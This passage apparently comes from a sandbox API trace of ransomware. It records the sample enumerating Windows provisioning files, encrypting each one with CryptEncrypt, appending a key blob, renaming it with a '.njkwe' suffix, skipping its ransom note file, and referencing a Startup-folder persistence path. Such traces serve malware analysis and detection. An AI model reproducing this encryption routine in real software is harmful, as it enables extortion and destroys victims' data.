(Estonia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0076.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\117__connections_cellular_emt (estonia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\117__Connections_Cellular_EMT (Estonia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\117__connections_cellular_emt (estonia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.510] GetProcessHeap () returned 0xbe0000 [0076.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.510] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904d0836, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904d0836, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904d0836, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x290, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="118__C~1.PRO")) returned 1 [0076.510] lstrcmpiW (lpString1="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.510] lstrcmpiW (lpString1="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.510] lstrcmpiW (lpString1="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.510] lstrcmpiW (lpString1="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.510] lstrcmpiW (lpString1="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.511] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml") returned 159 [0076.511] StrStrIW (lpFirst="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.511] lstrcmpW (lpString1="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.511] lstrcmpW (lpString1="118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.511] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\118__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.511] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\118__connections_cellular_tele2 (estonia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.511] GetTickCount () returned 0x1153777 [0076.511] GetTickCount () returned 0x1153777 [0076.511] GetTickCount () returned 0x1153777 [0076.511] GetTickCount () returned 0x1153777 [0076.511] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.511] GetProcessHeap () returned 0xbe0000 [0076.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.511] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x290, lpOverlapped=0x0) returned 1 [0076.513] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.513] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x290, lpOverlapped=0x0) returned 1 [0076.513] GetProcessHeap () returned 0xbe0000 [0076.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.513] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.513] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.513] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.513] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.513] CloseHandle (hObject=0x43c) returned 1 [0076.513] GetProcessHeap () returned 0xbe0000 [0076.513] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.513] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\118__connections_cellular_tele2 (estonia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\118__Connections_Cellular_Tele2 (Estonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\118__connections_cellular_tele2 (estonia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.514] GetProcessHeap () returned 0xbe0000 [0076.514] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.514] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904d0836, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904d0836, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904d0836, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="119__C~1.PRO")) returned 1 [0076.515] lstrcmpiW (lpString1="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.515] lstrcmpiW (lpString1="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.515] lstrcmpiW (lpString1="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.515] lstrcmpiW (lpString1="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.515] lstrcmpiW (lpString1="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.515] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml") returned 159 [0076.515] StrStrIW (lpFirst="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.515] lstrcmpW (lpString1="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.515] lstrcmpW (lpString1="119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.515] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\119__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.515] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\119__connections_cellular_tele2 (estonia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.515] GetTickCount () returned 0x1153787 [0076.515] GetTickCount () returned 0x1153787 [0076.515] GetTickCount () returned 0x1153787 [0076.515] GetTickCount () returned 0x1153787 [0076.515] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.515] GetProcessHeap () returned 0xbe0000 [0076.515] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.515] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0076.519] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.519] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0076.519] GetProcessHeap () returned 0xbe0000 [0076.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.519] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.519] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.519] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.519] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.520] CloseHandle (hObject=0x43c) returned 1 [0076.520] GetProcessHeap () returned 0xbe0000 [0076.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.520] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\119__connections_cellular_tele2 (estonia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\119__Connections_Cellular_Tele2 (Estonia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\119__connections_cellular_tele2 (estonia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.520] GetProcessHeap () returned 0xbe0000 [0076.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.520] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9013ce1d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9013ce1d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9013ce1d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", cAlternateFileName="11__CO~1.PRO")) returned 1 [0076.520] lstrcmpiW (lpString1="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.520] lstrcmpiW (lpString1="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.520] lstrcmpiW (lpString1="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.520] lstrcmpiW (lpString1="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.520] lstrcmpiW (lpString1="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.520] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml") returned 160 [0076.520] StrStrIW (lpFirst="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.520] lstrcmpW (lpString1="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.521] lstrcmpW (lpString1="11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.521] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\11__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\11__connections_cellular_optus (australia)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.521] GetTickCount () returned 0x1153787 [0076.521] GetTickCount () returned 0x1153787 [0076.521] GetTickCount () returned 0x1153787 [0076.521] GetTickCount () returned 0x1153787 [0076.521] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.521] GetProcessHeap () returned 0xbe0000 [0076.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.521] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0076.527] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.527] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0076.527] GetProcessHeap () returned 0xbe0000 [0076.527] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.527] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.527] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.527] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.527] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.527] CloseHandle (hObject=0x43c) returned 1 [0076.527] GetProcessHeap () returned 0xbe0000 [0076.527] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.527] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0076.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\11__connections_cellular_optus (australia)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\11__Connections_Cellular_Optus (Australia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\11__connections_cellular_optus (australia)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.528] GetProcessHeap () returned 0xbe0000 [0076.528] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.528] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904f6aa1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904f6aa1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904f6aa1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", cAlternateFileName="120__C~1.PRO")) returned 1 [0076.528] lstrcmpiW (lpString1="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.528] lstrcmpiW (lpString1="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.528] lstrcmpiW (lpString1="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.528] lstrcmpiW (lpString1="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.528] lstrcmpiW (lpString1="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.528] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml") returned 171 [0076.528] StrStrIW (lpFirst="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.528] lstrcmpW (lpString1="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.528] lstrcmpW (lpString1="120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.528] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\120__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\120__Connections_Cellular_Vodafone FO (Faroe Islands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\120__connections_cellular_vodafone fo (faroe islands)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.529] GetTickCount () returned 0x1153787 [0076.529] GetTickCount () returned 0x1153787 [0076.529] GetTickCount () returned 0x1153787 [0076.529] GetTickCount () returned 0x1153787 [0076.529] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.529] GetProcessHeap () returned 0xbe0000 [0076.529] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.529] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0076.534] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.534] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0076.534] GetProcessHeap () returned 0xbe0000 [0076.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.534] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 